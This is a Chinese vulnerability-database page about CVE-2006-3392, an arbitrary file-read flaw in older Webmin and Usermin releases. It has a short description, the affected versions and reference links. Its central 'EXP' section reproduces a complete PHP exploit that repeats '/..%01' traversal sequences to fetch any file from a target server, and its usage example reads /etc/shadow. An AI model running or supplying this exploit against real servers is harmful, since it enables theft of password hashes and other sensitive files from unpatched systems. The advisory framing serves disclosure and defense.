Webmin/Usermin未明信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110588 漏洞类型 输入验证
发布时间 2006-07-09 更新时间 2006-10-24
CVE编号 CVE-2006-3392 CNNVD-ID CNNVD-200607-036
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1997
https://www.securityfocus.com/bid/18744
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-036
|漏洞详情
Webmin1.290之前版本和Usermin1.220之前版本在解码HTML之前调用simplify_path函数,可以使远程攻击者读取任意文件,比如使用"..%01"序列,该序列可在从文件名中删除诸如"%01"等字节之前绕过"../"序列的删除。注:此漏洞不同于CVE-2006-3274。
|漏洞EXP
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date :  2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {


$z = "/..%01";
for ($i=0;$i<60;$i++) {
        $z.="/..%01";
}

$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";

echo "Attacking ".$host."\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";

} else {
        // IF INPUT IS NOT CORRECT DISPLAY THE README
        echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
        echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
        echo "Coded by joffer , http://securitydot.net\n";
}

?>

# milw0rm.com [2006-07-09]
|受影响的产品
Webmin Webmin 1.280 Webmin Webmin 1.270 Webmin Webmin 1.260 Webmin Webmin 1.250 Webmin Webmin 1.240 Webmin Webmin 1.230 Webmin Webmin 1.220
|参考资料

来源:US-CERT
名称:VU#999601
链接:http://www.kb.cert.org/vuls/id/999601
来源:OSVDB
名称:26772
链接:http://www.osvdb.org/26772
来源:VUPEN
名称:ADV-2006-2612
链接:http://www.frsirt.com/english/advisories/2006/2612
来源:SECUNIA
名称:21365
链接:http://secunia.com/advisories/21365
来源:SECUNIA
名称:20892
链接:http://secunia.com/advisories/20892
来源:www.webmin.com
链接:http://www.webmin.com/changes.html
来源:BID
名称:18744
链接:http://www.securityfocus.com/bid/18744
来源:BUGTRAQ
名称:20060715Webmin/UserminArbitraryFileDisclosureVulnerabilityPerl
链接:http://www.securityfocus.com/archive/1/archive/1/440493/100/0/threaded
来源:BUGTRAQ
名称:20060709Webmin/UserminArbitraryFileDisclosureVulnerabilityexploit
链接:http://www.securityfocus.com/archive/1/archive/1/439653/100/0/threaded
来源:GENTOO
名称:GLSA-200608-11
链接:http://security.gentoo.org/glsa/glsa-200608-11.xml
来源:SECUNIA
名称:21105
链接:http://secunia.com/advisories/21105
来源:MANDRIVA
名称:MDKSA-2006:125
链接:http://frontal2.mandriva.com/security/advisories?name=MDKSA-2006:125
来源:VIM
名称:20060630Webmintr